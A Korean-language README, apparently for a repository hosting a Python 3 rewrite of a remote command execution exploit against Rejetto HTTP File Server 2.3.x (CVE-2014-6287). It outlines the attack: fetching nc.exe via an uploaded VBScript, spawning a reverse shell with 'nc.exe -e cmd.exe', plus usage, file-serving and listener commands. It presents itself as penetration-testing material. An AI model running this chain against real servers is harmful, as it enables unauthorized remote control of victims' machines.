
Rejetto HTTP File Server 2.3.x (CVE-2014-6287)용 원격 명령 실행 익스플로잇으로, 현대 공격적 보안 테스트를 위해 Python 3로 재작성되었습니다.
이것은 CVE-2014-6287로 식별된 취약점을 활용하여 Rejetto HTTP File Server (HFS) v2.3.x를 대상으로 하는 고전적인 원격 명령 실행(RCE) 익스플로잇의 Python 3 재작성 버전입니다.
원래 Avinash Kumar Thapa (일명 "-Acid") 가 발견했으며, 이 버전은 완전한 파라미터화와 현대적인 호환성을 제공하여 이식성과 사용성을 개선했습니다.
이 도구는 교육 및 승인된 침투 테스트 목적으로만 제공됩니다. 본인이 소유하지 않았거나 명시적인 테스트 허가를 받지 않은 시스템에 대한 무단 사용은 불법이며 비윤리적입니다.
nc.exe를 호스팅하는 데 사용되는 포트nc.exe 리버스 셸 전달nc.exe를 다운로드하는 VBScript 업로드nc.exe -e cmd.exe를 실행하여 리버스 셸 수립python3 exploit.py <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LISTEN_LOCAL_PORT> <NC_DOWNLOAD_PORT>
Example:
python3 exploit.py 192.168.1.10 80 192.168.1.5 4444 8000
Requirements:
- HTTP server serving nc.exe:
python3 -m http.server 8000
- Listener:
nc -lvnp 4444